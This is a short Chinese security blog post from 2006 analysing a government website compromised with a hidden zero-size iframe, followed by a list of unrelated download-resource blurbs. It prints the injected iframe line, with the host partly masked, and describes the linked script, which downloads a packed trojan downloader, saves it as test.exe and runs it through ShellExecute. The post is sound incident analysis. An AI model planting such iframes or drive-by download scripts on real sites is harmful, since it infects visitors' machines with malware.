`
caobihole
  • 浏览: 952234 次
文章分类
社区版块
存档分类
最新评论

又一个下载恶意文件的政府网站

 
阅读更多

endurer 原创

2006-08-22 第1

首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/

hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

du.exe 采用 nSPack 1.3 加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul

分享到:
评论

相关推荐

    各级教学教育学校网站源码下载

    现在好了,有一套国内首创的学校网站系统正式版提供,学校网站系统全站源代码学校网站模板下载,它是国内最为知名的专著于学校网站建设的网软公司开发的产品,我们有着十年的学校网站建设经验,几万学校用户,为他们提供了...

    完美学校网站系统全站源代码学校网站模板下载

    学校网站系统全站源代码学校网站模板下载,信息时代,各级教学教育,公立私立民办学校部门,需要一个动态网站,实现学校介绍,学校概况,德育之窗,学科教研,教师园地,学生地盘,家长专栏,招生考试,交流互动,学校网上报名...

    某市中原常西湖新区政府和社会资本合作(PPP)专业咨询服务项目(付印)投标文件.docx

    3. 严格执行比价采购文件和报价文件中的要求; 4. 不与采购人或者其他供应商恶意串通; 5. 保证公平竞争,不提供虚假材料谋取成交; 6. 自觉维护法律服务市场秩序,不以不正当手段诋毁和排挤其他供应商; 7. 按采购...

    Malware-Detection-Using-Two-Dimensional-Binary-Program-Features:使用二维二进制程序功能进行基于深度神经网络的恶意软件检测的文档,源代码和数据链接

    概要恶意软件仍然是企业,政府机构和个人的严重问题,因为攻击者继续将其用作影响频繁且代价高昂的网络入侵的工具。 如今,恶意软件检测仍然主要通过启发式和基于签名的方法来完成,这些方法难以跟上恶意软件的发展...

    政府网络安全解决方案-.doc

    网络安全的整体性是指一个安全系统的建立,即包括采用 相应的安全设备,又包括相应的管理手段。安全设备不是指单一的某种安全设备,而是 指几种安全设备的综合。网络安全的动态性是指,网络安全是随着环境、时间的...

    asp代码网上问卷调查系统

    是一个适用于政府、教育机构、学校、企事业单位在互联网上进行信息互动与反馈收集的网上调研平台,可以满足这些机构开展深入网络调研的需要…… 1) 请登录后修改管理员名称及密码; 2) 建议修改数据库目录、名称及...

    迅雷7下载工具

    任何资源下载网站如果不希望被迅雷资源聚合引擎收录,应该及时向迅雷反映,有关详细信息,请与我们联系 ,否则,迅雷资源聚合引擎将视其为可收录的资源下载网站 我们的知识产权政策是对符合《信息网络传播权保护...

    某地政府网站

    最后一个文件也可在后台-基本设置中修改。 7、服务器支持ASP,FSO(文件可读写权限),部分需要支持xmlhttp组件、CreatePreviewImage.cGvbox组件,一般的asp空间都会具备。 8、本程序不含任何广告等恶意代码,请放心使用...

    大型学校教育类网站源码,测试完整!

    职业技术学院网站,学院网站,职业学校网站,培训学校网站,大学学校网站,大专学校网站,高职高专学校网站,电脑学校网站,职业学校,培训学校,技术学校,中职学校网站,技术学校网站管理系统正式版,教育局网站,政府教育...

    创力网站管理系统 v4.2

    《创力网站管理系统》英文全名《CreateLive CMS》以下简称“《Cl CMS》”: 是北京今日学易科技有限公司基于ASP技术开发的网站管理系统,是一个经过完善设计并适用于各种服务器环境的易用、安全、高效、快速、...

    大型学校网站源码学校网页模板正式版

    职业学校,培训学校,技术学校,中职学校网站,技术学校网站管理系统正式版,教育局网站,政府教育部门网站,教育教学事业单位,私立学校网站,民办学校网站进行网站建设的网站系统.是一套功能完善的优秀的学校网站源代码...

    javapms门户网站源码

    Java是一种被广泛使用的网络编程语言,主要应用于企业、政府部门、电信、银行、手机平台开发等多个领域,是现在大型软件项目开发中的主角,长期占据《TIOBE世界编程语言排行榜》第一的宝座。随着Internet的发展,...

    PHP和MySQL WEB开发(第4版)

    2.8.3 删除一个文件:unlink() 2.8.4 在文件中定位:rewind()、fseek()和ftell() 2.9 文件锁定 2.10 更好的方式:数据库管理系统 2.10.1 使用普通文件的几个问题 2.10.2 RDBMS是如何解决这些问题的 2.11 进一步学习...

    PHP和MySQL Web开发第4版pdf以及源码

    2.8.3 删除一个文件:unlink() 2.8.4 在文件中定位:rewind()、fseek()和ftell() 2.9 文件锁定 2.10 更好的方式:数据库管理系统 2.10.1 使用普通文件的几个问题 2.10.2 RDBMS是如何解决这些问题的 2.11 ...

    PHP和MySQL Web开发第4版

    2.8.3 删除一个文件:unlink() 2.8.4 在文件中定位:rewind()、fseek()和ftell() 2.9 文件锁定 2.10 更好的方式:数据库管理系统 2.10.1 使用普通文件的几个问题 2.10.2 RDBMS是如何解决这些问题的 2.11 ...

    创易CreateEasy CMS V1.0 Beta版

    本系统基于ASP语言和MSSQL/ACCESS数据库开发,是一个经过完善设计并适用于各种服务器环境的高效、易用、快速、安全和优秀的网站解决方案,无论在稳定性、负载能力、安全保障等方面都做到了尽可能的完善。 创易CMS...

    网络安全的主要威胁及应对方法.doc

    (4)恶意网站设置的陷阱 互联网世界的各类网站,有些网站恶意编制一些盗取他人信息的软件,并且可能 隐藏在下载的信息中,只要登录或者下载网络的信息就会被其控制和感染病毒,计算机 中的所有信息都会被自动盗走,...

    汇讯wiseuc企业即时通讯软件

     Wiseuc2.9后台文件传输,均可通过文件加密的方式进行传输,有效防止文件遭恶意破解给企业造成的直接损失。  4、群/组文件柜新增上传下载记忆功能  汇讯wiseuc2.9在群组文件柜里新增下载记忆功能,所有员工上传...

    计算机应用技术(实用手册)

    这里的IDE设备包括了IDE硬盘和IDE光驱,第一、第二组设备是指主板上的第一、第二根IDE数据线,一般来说靠近芯片的是第一组IDE设备,而主设备、从设备是指在一条IDE数据线上接的两个设备,大家知道每根数据线上可以接...

Global site tag (gtag.js) - Google Analytics